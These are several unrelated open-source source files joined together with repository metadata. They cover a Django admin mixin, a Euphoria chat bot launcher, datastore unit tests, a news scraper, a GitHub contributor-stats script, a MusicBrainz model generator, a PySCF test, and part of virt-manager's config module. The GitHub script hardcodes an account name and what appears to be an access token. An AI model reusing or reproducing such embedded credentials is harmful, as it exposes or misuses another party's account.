if not self.has_add_permission(request): # pragma: no cover
raise PermissionDenied
model = self.model
opts = model._meta
try:
each_context = self.admin_site.each_context(request)
except TypeError: # Django <= 1.7 pragma: no cover
each_context = self.admin_site.each_context()
# Get the rest of the context.
context = dict(
each_context,
opts = opts,
app_label = opts.app_label,
module_name = capfirst(opts.verbose_name),
title = _("Upload Nordea transactions"),
transactions_handler = get_handler_instance('TRANSACTION_CALLBACKS_HANDLER')
)
context.update(extra_context or {})
view = self.view_class.as_view()
return view(request, context=context)
def changelist_view(self, request, extra_context=None):
context = dict(
orig_template = str(getattr(super(), 'change_list_template')),
)
context.update(extra_context or {})
self.change_list_template = self.nda_change_list_template
return super().changelist_view(request, context)
if settings.NORDEA_UPLOAD_ENABLED:
# Dynamically inject the mixin to transactions admin
TransactionAdmin.__bases__ = (NordeaUploadMixin, ) + TransactionAdmin.__bases__
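# Editorial note (not in the original file): prepending to __bases__ here has
# the same effect as declaring TransactionAdmin with NordeaUploadMixin first in
# its MRO; doing it dynamically keeps the Nordea upload view out of deployments
# where NORDEA_UPLOAD_ENABLED is false.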
|
mit
| 8,746,984,828,914,234,000
| 40.712121
| 108
| 0.668362
| false
| 4.102832
| false
| false
| false
|
ArkaneMoose/BotBot
|
botbot/main.py
|
1
|
3722
|
import sys
import re
import json
import argparse
import euphoria as eu
from .botbot import BotBot
from . import euphutils
from . import snapshot
room_name = 'testing'
password = None
nickname = 'BotBot'
help_text = '''\
@BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates
other bots.
Usage
================================================================================
Create a bot with @BotName with some code.
!createbot @BotName CODE
Same as the previous but specify the room to put the bot in.
!createbot &room @BotName CODE
List all the bots that are currently running and have been created by @BotBot.
!list @BotBot
Send a bot with the name @BotName to the specified room.
!sendbot &room @BotName
Kill a bot with the name @BotName.
!kill @BotName
Pause a bot with the name @BotName.
!pause @BotName
Kill all the bots created by @BotBot.
!killall @BotName
Take a snapshot of the state of @BotBot.
!save @BotBot
Load the latest snapshot.
!load @BotBot latest
Load a snapshot with a specific file name.
!load @BotBot FILENAME
Restart @BotBot.
!restart @BotBot
More Info
================================================================================
View the @BotBot wiki at https://github.com/ArkaneMoose/BotBot/wiki for a
comprehensive guide on how to use @BotBot, including a guide on how to write
@BotBot code and a list of features and restrictions that bots created with
@BotBot have.
Good luck!
================================================================================
Good luck on your journey to becoming a bot programmer.
If you need help, you can ask @myhandsaretypingwords, @nihizg, or any of the
other awesome Euphorians in &programming for help with any bot-related questions.
Have fun, and please be respectful!
@BotBot is open-source! Feel free to view the code, contribute, and report
issues at https://github.com/ArkaneMoose/BotBot.
@BotBot complies with the Euphorian bot standards.\
'''
short_help_text = '''\
@BotBot is a bot for Euphoria created by @myhandsaretypingwords that creates
other bots. Type "!help @BotBot" to learn more.\
'''
def main():
botbot = BotBot(room_name, password, nickname, help_text, short_help_text)
eu.executable.start(botbot)
def get_args():
parser = argparse.ArgumentParser(prog='botbot', description='A meta-bot for Euphoria.', epilog='For details, read the README.md file at https://github.com/ArkaneMoose/BotBot/blob/master/README.md')
parser.add_argument('config-file', nargs='?', help='optional path to a JSON configuration file')
parser.add_argument('-r', '--room', help='room in Euphoria where @BotBot should reside')
parser.add_argument('-p', '--password', help='password for room if necessary')
parser.add_argument('-n', '--nickname', help='custom nickname for @BotBot')
parser.add_argument('-s', '--snapshot-dir', help='directory where snapshots will be read and written')
return parser.parse_args()
if __name__ == '__main__':
args = vars(get_args())
if args.get('config-file'):
with open(args.get('config-file')) as f:
config = json.load(f)
else:
config = {}
room_name = args['room'] or config.get('room', room_name)
password = args['password'] or config.get('password', password)
nickname = args['nickname'] or config.get('nickname', nickname)
help_text = config.get('helpText', help_text.replace('@BotBot', euphutils.mention(nickname)))
short_help_text = config.get('shortHelpText', short_help_text.replace('@BotBot', euphutils.mention(nickname)))
snapshot.snapshot_dir = args['snapshot_dir'] or config.get('snapshotDirectory', snapshot.snapshot_dir)
main()
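# Example configuration file (editorial sketch; the keys mirror the
# config.get() lookups above, the values are placeholders):
#
#     {
#         "room": "testing",
#         "nickname": "BotBot",
#         "snapshotDirectory": "snapshots"
#     }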
|
mit
| -5,159,026,592,452,285,000
| 36.979592
| 201
| 0.671145
| false
| 3.645446
| true
| false
| false
|
sirca/bdkd_datastore
|
datastore/tests/unit/bdkd/datastore/util/test_copy_move.py
|
1
|
3291
|
# Copyright 2015 Nicta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding=utf-8
import unittest
import argparse
import os
# Load a custom configuration for unit testing
os.environ['BDKD_DATASTORE_CONFIG'] = os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'conf', 'test.conf')
from bdkd.datastore.util import ds_util
FIXTURES = os.path.join(os.path.dirname(__file__),
'..', '..', '..', '..', 'fixtures')
class CopyMoveUtilitiesTest(unittest.TestCase):
def setUp(self):
self.filepath = os.path.join(FIXTURES, 'FeatureCollections', 'Coastlines',
'Seton_etal_ESR2012_Coastlines_2012.1.gpmlz')
self.parser = argparse.ArgumentParser()
subparser = self.parser.add_subparsers(dest='subcmd')
ds_util._create_subparsers(subparser)
def test_copy_same_repository_arguments(self):
args_in = [ 'copy', 'test-repository', 'from_resource', 'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository, None)
self.assertEquals(args.to_resource_name, 'to_resource')
def test_copy_across_repositories_arguments(self):
args_in = [ 'copy', 'test-repository', 'from_resource', 'test-repository',
'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository.name, 'test-repository')
self.assertEquals(args.to_resource_name, 'to_resource')
def test_move_same_repository_arguments(self):
args_in = [ 'move', 'test-repository', 'from_resource', 'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository, None)
self.assertEquals(args.to_resource_name, 'to_resource')
def test_move_across_repositories_arguments(self):
args_in = [ 'move', 'test-repository', 'from_resource', 'test-repository',
'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository.name, 'test-repository')
self.assertEquals(args.to_resource_name, 'to_resource')
|
apache-2.0
| -4,339,567,989,079,044,000
| 40.658228
| 83
| 0.675175
| false
| 3.710259
| true
| false
| false
|
HIIT/mediacollection
|
sites/helsinginuutiset.py
|
1
|
1658
|
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import processor
from datetime import datetime
def parse( url ):
r = requests.get( url )
if r.status_code == 404:
return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u''])
r.encoding = 'UTF-8'
soup = BeautifulSoup( r.text, "html.parser" )
article = soup.find( 'article' )
if article == None:
return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u''])
processor.decompose_all( article.find_all( 'script' ) )
departments = article.find( class_ = 'field-name-field-department-tref' )
categories = processor.collect_categories( departments.find_all( 'a' ) )
datetime_list = processor.collect_datetime( article.find( class_ = 'field-name-post-date' ) )
author = article.find( class_ = 'author' )
if author != None:
processor.decompose( author.find( class_ = 'img' ) )
author = processor.collect_text( author.find( 'h3' ) )
else:
author = u''
title = processor.collect_text( article.find( 'h1' ) )
text = processor.collect_text( article.find( class_ = 'field field-name-body' ) )
images = processor.collect_images_by_parent( article.find_all( class_ = 'img' ), '')
captions = processor.collect_image_captions( article.find_all( class_ = 'caption' ) )
return processor.create_dictionary('Helsingin uutiset', url, r.status_code, categories, datetime_list, author, title, u'', text, images, captions)
if __name__ == '__main__':
parse("http://www.helsinginuutiset.fi/artikkeli/433833-arvio-15-000-ihmista-saa-tana-vuonna-tyopaikan-kunnasta-tarvetta-etenkin")
|
mit
| 8,901,220,503,216,206,000
| 36.681818
| 147
| 0.670084
| false
| 2.883478
| false
| false
| false
|
flrvm/cobratoolbox
|
.github/github_stats.py
|
1
|
1459
|
from github import Github
g = Github("cobrabot", "dd31ac21736aeeaeac764ce1192c17e370679a25")
cobratoolbox = g.get_user("opencobra").get_repo("cobratoolbox")
contributors = {}
for contributor in cobratoolbox.get_stats_contributors():
a = 0
d = 0
c = 0
for week in contributor.weeks:
a += week.a
d += week.d
c += week.c
contributors[contributor.author.login] = {
'additions': a, 'deletions': d, 'commits': c, 'avatar': contributor.author.avatar_url}
print "name: %20s, additions: %10d, deletions: %10d, commits: %10d" % (contributor.author.login, a, d, c)
sorted_by_commits = sorted(contributors.items(), key=lambda x: x[1]['commits'])
table = '\n.. raw:: html\n\n <table style="margin:0px auto" width="100%">'
for k in range(0, 5):
table += """\n
<tr>
<td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td>
<td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td>
</tr>""" % (sorted_by_commits[-(2 * k + 1)][1]['avatar'], sorted_by_commits[-(2 * k + 1)][0], sorted_by_commits[-(2 * k + 1)][0],
sorted_by_commits[-(2 * (k + 1))][1]['avatar'], sorted_by_commits[-(2 * (k + 1))][0], sorted_by_commits[-(2 * (k + 1))][0])
table += "\n </table>"
with open("docs/source/contributors.rst", "w") as readme:
readme.write(table)
|
gpl-3.0
| 1,395,502,001,221,579,800
| 40.685714
| 137
| 0.58122
| false
| 2.838521
| false
| false
| false
|
marios-zindilis/musicbrainz-django-models
|
_build/model.py
|
1
|
3430
|
#!/usr/bin/env python3
import sys
try:
MODEL_NAME = sys.argv[1]
except IndexError:
print('Model Name Not Provided')
exit(1)
MODEL_NAME_TITLE = MODEL_NAME.title().replace('_', ' ')
MODEL = 'musicbrainz_django_models/models/{}.py'.format(MODEL_NAME)
INIT = 'musicbrainz_django_models/models/__init__.py'
SQL = '_etc/CreateTables.sql'
SQL_EXISTS = False
SQL_TABLE = []
SQL_TABLE_INCLUDES_ID = False
SQL_TABLE_INCLUDES_GID = False
IMPORTS = [
'from django.db import models',
'from django.utils.encoding import python_2_unicode_compatible',
]
FIELDS = []
GID_DOC = ''
MODELS = []
MODEL_TEMPLATE = '''"""
.. module:: {MODEL_NAME}
The **{MODEL_NAME_TITLE}** Model.
PostgreSQL Definition
---------------------
The :code:`{MODEL_NAME}` table is defined in the MusicBrainz Server as:
.. code-block:: sql
{SQL_TABLE}
"""
{IMPORTS}
@python_2_unicode_compatible
class {MODEL_NAME}(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
{GID_DOC}
"""
{FIELDS}
def __str__(self):
return self.name
class Meta:
db_table = '{MODEL_NAME}'
'''
with open(SQL, 'r') as sql:
for line in sql:
if (
line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or
line == 'CREATE TABLE {}\n'.format(MODEL_NAME)
):
SQL_EXISTS = True
break
if not SQL_EXISTS:
print('CREATE TABLE {} Not Found'.format(MODEL_NAME))
exit(1)
with open(SQL, 'r') as sql:
SQL_TABLE_CAPTURE = False
for line in sql:
if (
line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or
line == 'CREATE TABLE {}\n'.format(MODEL_NAME)
):
SQL_TABLE_CAPTURE = True
if SQL_TABLE_CAPTURE and line.startswith(');'):
SQL_TABLE.append(line)
SQL_TABLE_CAPTURE = False
break
if SQL_TABLE_CAPTURE:
if not SQL_TABLE_INCLUDES_ID:
SQL_TABLE_INCLUDES_ID = ' serial,' in line.lower()
if not SQL_TABLE_INCLUDES_GID:
SQL_TABLE_INCLUDES_GID = ' uuid ' in line.lower()
SQL_TABLE.append(line)
if SQL_TABLE_INCLUDES_ID:
FIELDS.append(' id = models.AutoField(primary_key=True)')
if SQL_TABLE_INCLUDES_GID:
IMPORTS.append('import uuid')
FIELDS.append(' gid = models.UUIDField(default=uuid.uuid4)')
GID_DOC = """:param gid: this is interesting because it cannot be NULL but a default is
not defined in SQL. The default `uuid.uuid4` in Django will generate a
UUID during the creation of an instance."""
with open(MODEL, 'w') as model:
model.write(MODEL_TEMPLATE.format(
MODEL_NAME=MODEL_NAME,
MODEL_NAME_TITLE=MODEL_NAME_TITLE,
SQL_TABLE=' '.join(SQL_TABLE),
IMPORTS='\n'.join(IMPORTS),
FIELDS='\n'.join(FIELDS),
GID_DOC=GID_DOC
))
with open(INIT, 'r') as init:
MODELS = [line.split()[-1] for line in init if line.startswith('from ')]
MODELS.append(MODEL_NAME)
with open(INIT, 'w') as init:
for mod in MODELS:
init.write('from .{mod} import {mod}\n'.format(mod=mod))
init.write('\n')
init.write('# __all__ silences PEP8 `module imported but unused`:\n')
init.write('__all__ = [\n')
for mod in MODELS:
init.write(' {mod},\n'.format(mod=mod))
init.write(']\n')
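# Illustrative invocation (editorial sketch; the table name is only an example):
#
#     python3 _build/model.py area
#
# This reads the CREATE TABLE statement for `area` from _etc/CreateTables.sql,
# renders MODEL_TEMPLATE into musicbrainz_django_models/models/area.py and
# re-registers every model in musicbrainz_django_models/models/__init__.py.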
|
gpl-2.0
| -6,831,984,093,304,596,000
| 26.66129
| 91
| 0.6
| false
| 3.298077
| false
| false
| false
|
sunqm/pyscf
|
pyscf/eph/test/test_uhf.py
|
1
|
2089
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyscf import scf, gto
from pyscf.eph import eph_fd, uhf
import numpy as np
import unittest
mol = gto.M()
mol.atom = [['O', [0.000000000000, -0.000000000775, 0.923671924285]],
['H', [-0.000000000000, -1.432564848017, 2.125164039823]],
['H', [0.000000000000, 1.432564848792, 2.125164035930]]]
mol.unit = 'Bohr'
mol.basis = 'sto3g'
mol.verbose=4
mol.build() # this is a pre-computed relaxed geometry
class KnownValues(unittest.TestCase):
def test_finite_diff_uhf_eph(self):
mf = scf.UHF(mol)
mf.conv_tol = 1e-16
mf.conv_tol_grad = 1e-10
mf.kernel()
grad = mf.nuc_grad_method().kernel()
self.assertTrue(abs(grad).max()<1e-5)
mat, omega = eph_fd.kernel(mf)
matmo, _ = eph_fd.kernel(mf, mo_rep=True)
myeph = uhf.EPH(mf)
eph, _ = myeph.kernel()
ephmo, _ = myeph.kernel(mo_rep=True)
for i in range(len(omega)):
self.assertTrue(min(np.linalg.norm(eph[:,i]-mat[:,i]),np.linalg.norm(eph[:,i]+mat[:,i]))<1e-5)
self.assertTrue(min(abs(eph[:,i]-mat[:,i]).max(), abs(eph[:,i]+mat[:,i]).max())<1e-5)
self.assertTrue(min(np.linalg.norm(ephmo[:,i]-matmo[:,i]),np.linalg.norm(ephmo[:,i]+matmo[:,i]))<1e-5)
self.assertTrue(min(abs(ephmo[:,i]-matmo[:,i]).max(), abs(ephmo[:,i]+matmo[:,i]).max())<1e-5)
if __name__ == '__main__':
print("Full Tests for UHF")
unittest.main()
|
apache-2.0
| -3,297,742,572,155,970,000
| 36.981818
| 114
| 0.632839
| false
| 2.97155
| true
| false
| false
|
noskill/virt-manager
|
virtManager/config.py
|
1
|
25087
|
#
# Copyright (C) 2006, 2012-2014 Red Hat, Inc.
# Copyright (C) 2006 Daniel P. Berrange <berrange@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import os
import logging
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from virtinst import CPU
from .keyring import vmmKeyring, vmmSecret
running_config = None
class SettingsWrapper(object):
def __init__(self, settings_id):
self._root = settings_id
self._settings = Gio.Settings.new(self._root)
self._settingsmap = {"": self._settings}
self._handler_map = {}
for child in self._settings.list_children():
childschema = self._root + "." + child
self._settingsmap[child] = Gio.Settings.new(childschema)
def _parse_key(self, key):
value = key.strip("/")
settingskey = ""
if "/" in value:
settingskey, value = value.rsplit("/", 1)
return settingskey, value
def make_vm_settings(self, key):
settingskey = self._parse_key(key)[0]
if settingskey in self._settingsmap:
return True
schema = self._root + ".vm"
path = "/" + self._root.replace(".", "/") + key.rsplit("/", 1)[0] + "/"
self._settingsmap[settingskey] = Gio.Settings.new_with_path(schema,
path)
return True
def _find_settings(self, key):
settingskey, value = self._parse_key(key)
return self._settingsmap[settingskey], value
def _cmd_helper(self, cmd, key, *args, **kwargs):
settings, key = self._find_settings(key)
return getattr(settings, cmd)(key, *args, **kwargs)
def notify_add(self, key, cb, *args, **kwargs):
settings, key = self._find_settings(key)
def wrapcb(*ignore):
return cb(*args, **kwargs)
ret = settings.connect("changed::%s" % key, wrapcb, *args, **kwargs)
self._handler_map[ret] = settings
return ret
def notify_remove(self, h):
settings = self._handler_map.pop(h)
return settings.disconnect(h)
def get(self, key):
return self._cmd_helper("get_value", key).unpack()
def set(self, key, value, *args, **kwargs):
fmt = self._cmd_helper("get_value", key).get_type_string()
return self._cmd_helper("set_value", key,
GLib.Variant(fmt, value),
*args, **kwargs)
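# Illustrative usage of SettingsWrapper (editorial sketch, not part of the
# original file); keys are slash-separated paths resolved against the GSettings
# children, e.g.:
#
#     conf = SettingsWrapper("org.virt-manager.virt-manager")
#     interval = conf.get("/stats/update-interval")
#     conf.set("/console/scaling", 2)
#
# The paths shown are the same ones vmmConfig uses below.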
class vmmConfig(object):
# key names for saving last used paths
CONFIG_DIR_IMAGE = "image"
CONFIG_DIR_ISO_MEDIA = "isomedia"
CONFIG_DIR_FLOPPY_MEDIA = "floppymedia"
CONFIG_DIR_SAVE = "save"
CONFIG_DIR_RESTORE = "restore"
CONFIG_DIR_SCREENSHOT = "screenshot"
CONFIG_DIR_FS = "fs"
# Metadata mapping for browse types. Prob shouldn't go here, but works
# for now.
browse_reason_data = {
CONFIG_DIR_IMAGE : {
"enable_create" : True,
"storage_title" : _("Locate or create storage volume"),
"local_title" : _("Locate existing storage"),
"dialog_type" : Gtk.FileChooserAction.SAVE,
"choose_button" : Gtk.STOCK_OPEN,
},
CONFIG_DIR_ISO_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate ISO media volume"),
"local_title" : _("Locate ISO media"),
},
CONFIG_DIR_FLOPPY_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate floppy media volume"),
"local_title" : _("Locate floppy media"),
},
CONFIG_DIR_FS : {
"enable_create" : False,
"storage_title" : _("Locate directory volume"),
"local_title" : _("Locate directory volume"),
"dialog_type" : Gtk.FileChooserAction.SELECT_FOLDER,
},
}
CONSOLE_SCALE_NEVER = 0
CONSOLE_SCALE_FULLSCREEN = 1
CONSOLE_SCALE_ALWAYS = 2
DEFAULT_XEN_IMAGE_DIR = "/var/lib/xen/images"
DEFAULT_XEN_SAVE_DIR = "/var/lib/xen/dump"
DEFAULT_VIRT_IMAGE_DIR = "/var/lib/libvirt/images"
DEFAULT_VIRT_SAVE_DIR = "/var/lib/libvirt"
def __init__(self, appname, cliconfig, test_first_run=False):
self.appname = appname
self.appversion = cliconfig.__version__
self.conf_dir = "/org/virt-manager/%s/" % self.appname
self.ui_dir = os.path.join(cliconfig.asset_dir, "ui")
self.test_first_run = bool(test_first_run)
self.conf = SettingsWrapper("org.virt-manager.virt-manager")
# We don't create it straight away, since we don't want
# to block the app pending user authorization to access
# the keyring
self.keyring = None
self.default_qemu_user = cliconfig.default_qemu_user
self.stable_defaults = cliconfig.stable_defaults
self.preferred_distros = cliconfig.preferred_distros
self.hv_packages = cliconfig.hv_packages
self.libvirt_packages = cliconfig.libvirt_packages
self.askpass_package = cliconfig.askpass_package
self.default_graphics_from_config = cliconfig.default_graphics
self.with_bhyve = cliconfig.with_bhyve
self.cli_usbredir = None
self.default_storage_format_from_config = "qcow2"
self.cpu_default_from_config = "host-cpu-model"
self.default_console_resizeguest = 0
self.default_add_spice_usbredir = "yes"
self._objects = []
self.support_inspection = self.check_inspection()
self._spice_error = None
global running_config
running_config = self
def check_inspection(self):
try:
# Check we can open the Python guestfs module.
from guestfs import GuestFS # pylint: disable=import-error
GuestFS(close_on_exit=False)
return True
except:
return False
# General app wide helpers (gsettings agnostic)
def get_appname(self):
return self.appname
def get_appversion(self):
return self.appversion
def get_ui_dir(self):
return self.ui_dir
def embeddable_graphics(self):
ret = ["vnc", "spice"]
return ret
def remove_notifier(self, h):
self.conf.notify_remove(h)
# Used for debugging reference leaks, we keep track of all objects
# come and go so we can do a leak report at app shutdown
def add_object(self, obj):
self._objects.append(obj)
def remove_object(self, obj):
self._objects.remove(obj)
def get_objects(self):
return self._objects[:]
def _make_pervm_key(self, uuid, key):
return "/vms/%s%s" % (uuid.replace("-", ""), key)
def listen_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.notify_add(key, *args, **kwargs)
def set_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
ret = self.conf.set(key, *args, **kwargs)
return ret
def get_pervm(self, uuid, key):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.get(key)
###################
# General helpers #
###################
# Manager stats view preferences
def is_vmlist_guest_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/cpu-usage")
def is_vmlist_host_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/host-cpu-usage")
def is_vmlist_memory_usage_visible(self):
return self.conf.get("/vmlist-fields/memory-usage")
def is_vmlist_disk_io_visible(self):
return self.conf.get("/vmlist-fields/disk-usage")
def is_vmlist_network_traffic_visible(self):
return self.conf.get("/vmlist-fields/network-traffic")
def set_vmlist_guest_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/cpu-usage", state)
def set_vmlist_host_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/host-cpu-usage", state)
def set_vmlist_memory_usage_visible(self, state):
self.conf.set("/vmlist-fields/memory-usage", state)
def set_vmlist_disk_io_visible(self, state):
self.conf.set("/vmlist-fields/disk-usage", state)
def set_vmlist_network_traffic_visible(self, state):
self.conf.set("/vmlist-fields/network-traffic", state)
def on_vmlist_guest_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/cpu-usage", cb)
def on_vmlist_host_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/host-cpu-usage", cb)
def on_vmlist_memory_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/memory-usage", cb)
def on_vmlist_disk_io_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/disk-usage", cb)
def on_vmlist_network_traffic_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/network-traffic", cb)
# Keys preferences
def get_keys_combination(self):
ret = self.conf.get("/console/grab-keys")
if not ret:
# Left Control + Left Alt
return "65507,65513"
return ret
def set_keys_combination(self, val):
# Val have to be a list of integers
val = ','.join([str(v) for v in val])
self.conf.set("/console/grab-keys", val)
def on_keys_combination_changed(self, cb):
return self.conf.notify_add("/console/grab-keys", cb)
# This key is not intended to be exposed in the UI yet
def get_keyboard_grab_default(self):
return self.conf.get("/console/grab-keyboard")
def set_keyboard_grab_default(self, val):
self.conf.set("/console/grab-keyboard", val)
def on_keyboard_grab_default_changed(self, cb):
return self.conf.notify_add("/console/grab-keyboard", cb)
# Confirmation preferences
def get_confirm_forcepoweroff(self):
return self.conf.get("/confirm/forcepoweroff")
def get_confirm_poweroff(self):
return self.conf.get("/confirm/poweroff")
def get_confirm_pause(self):
return self.conf.get("/confirm/pause")
def get_confirm_removedev(self):
return self.conf.get("/confirm/removedev")
def get_confirm_interface(self):
return self.conf.get("/confirm/interface-power")
def get_confirm_unapplied(self):
return self.conf.get("/confirm/unapplied-dev")
def get_confirm_delstorage(self):
return self.conf.get("/confirm/delete-storage")
def set_confirm_forcepoweroff(self, val):
self.conf.set("/confirm/forcepoweroff", val)
def set_confirm_poweroff(self, val):
self.conf.set("/confirm/poweroff", val)
def set_confirm_pause(self, val):
self.conf.set("/confirm/pause", val)
def set_confirm_removedev(self, val):
self.conf.set("/confirm/removedev", val)
def set_confirm_interface(self, val):
self.conf.set("/confirm/interface-power", val)
def set_confirm_unapplied(self, val):
self.conf.set("/confirm/unapplied-dev", val)
def set_confirm_delstorage(self, val):
self.conf.set("/confirm/delete-storage", val)
# System tray visibility
def on_view_system_tray_changed(self, cb):
return self.conf.notify_add("/system-tray", cb)
def get_view_system_tray(self):
return self.conf.get("/system-tray")
def set_view_system_tray(self, val):
self.conf.set("/system-tray", val)
# Stats history and interval length
def get_stats_history_length(self):
return 120
def get_stats_update_interval(self):
interval = self.conf.get("/stats/update-interval")
if interval < 1:
return 1
return interval
def set_stats_update_interval(self, interval):
self.conf.set("/stats/update-interval", interval)
def on_stats_update_interval_changed(self, cb):
return self.conf.notify_add("/stats/update-interval", cb)
# Disable/Enable different stats polling
def get_stats_enable_cpu_poll(self):
return self.conf.get("/stats/enable-cpu-poll")
def get_stats_enable_disk_poll(self):
return self.conf.get("/stats/enable-disk-poll")
def get_stats_enable_net_poll(self):
return self.conf.get("/stats/enable-net-poll")
def get_stats_enable_memory_poll(self):
return self.conf.get("/stats/enable-memory-poll")
def set_stats_enable_cpu_poll(self, val):
self.conf.set("/stats/enable-cpu-poll", val)
def set_stats_enable_disk_poll(self, val):
self.conf.set("/stats/enable-disk-poll", val)
def set_stats_enable_net_poll(self, val):
self.conf.set("/stats/enable-net-poll", val)
def set_stats_enable_memory_poll(self, val):
self.conf.set("/stats/enable-memory-poll", val)
def on_stats_enable_cpu_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-cpu-poll", cb, row)
def on_stats_enable_disk_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-disk-poll", cb, row)
def on_stats_enable_net_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-net-poll", cb, row)
def on_stats_enable_memory_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-memory-poll", cb, row)
# VM Console preferences
def on_console_accels_changed(self, cb):
return self.conf.notify_add("/console/enable-accels", cb)
def get_console_accels(self):
console_pref = self.conf.get("/console/enable-accels")
if console_pref is None:
console_pref = False
return console_pref
def set_console_accels(self, pref):
self.conf.set("/console/enable-accels", pref)
def on_console_scaling_changed(self, cb):
return self.conf.notify_add("/console/scaling", cb)
def get_console_scaling(self):
return self.conf.get("/console/scaling")
def set_console_scaling(self, pref):
self.conf.set("/console/scaling", pref)
def on_console_resizeguest_changed(self, cb):
return self.conf.notify_add("/console/resize-guest", cb)
def get_console_resizeguest(self):
val = self.conf.get("/console/resize-guest")
if val == -1:
val = self.default_console_resizeguest
return val
def set_console_resizeguest(self, pref):
self.conf.set("/console/resize-guest", pref)
def get_auto_redirection(self):
if self.cli_usbredir is not None:
return self.cli_usbredir
return self.conf.get("/console/auto-redirect")
def set_auto_redirection(self, state):
self.conf.set("/console/auto-redirect", state)
# Show VM details toolbar
def get_details_show_toolbar(self):
res = self.conf.get("/details/show-toolbar")
if res is None:
res = True
return res
def set_details_show_toolbar(self, state):
self.conf.set("/details/show-toolbar", state)
# VM details default size
def get_details_window_size(self):
w = self.conf.get("/details/window_width")
h = self.conf.get("/details/window_height")
return (w, h)
def set_details_window_size(self, w, h):
self.conf.set("/details/window_width", w)
self.conf.set("/details/window_height", h)
# New VM preferences
def get_new_vm_sound(self):
return self.conf.get("/new-vm/add-sound")
def set_new_vm_sound(self, state):
self.conf.set("/new-vm/add-sound", state)
def get_graphics_type(self, raw=False):
ret = self.conf.get("/new-vm/graphics-type")
if ret not in ["system", "vnc", "spice"]:
ret = "system"
if ret == "system" and not raw:
return self.default_graphics_from_config
return ret
def set_graphics_type(self, gtype):
self.conf.set("/new-vm/graphics-type", gtype.lower())
def get_add_spice_usbredir(self, raw=False):
ret = self.conf.get("/new-vm/add-spice-usbredir")
if ret not in ["system", "yes", "no"]:
ret = "system"
if not raw and not self.get_graphics_type() == "spice":
return "no"
if ret == "system" and not raw:
return self.default_add_spice_usbredir
return ret
def set_add_spice_usbredir(self, val):
self.conf.set("/new-vm/add-spice-usbredir", val)
def get_default_storage_format(self, raw=False):
ret = self.conf.get("/new-vm/storage-format")
if ret not in ["default", "raw", "qcow2"]:
ret = "default"
if ret == "default" and not raw:
return self.default_storage_format_from_config
return ret
def set_storage_format(self, typ):
self.conf.set("/new-vm/storage-format", typ.lower())
def get_default_cpu_setting(self, raw=False, for_cpu=False):
ret = self.conf.get("/new-vm/cpu-default")
whitelist = [CPU.SPECIAL_MODE_HOST_MODEL_ONLY,
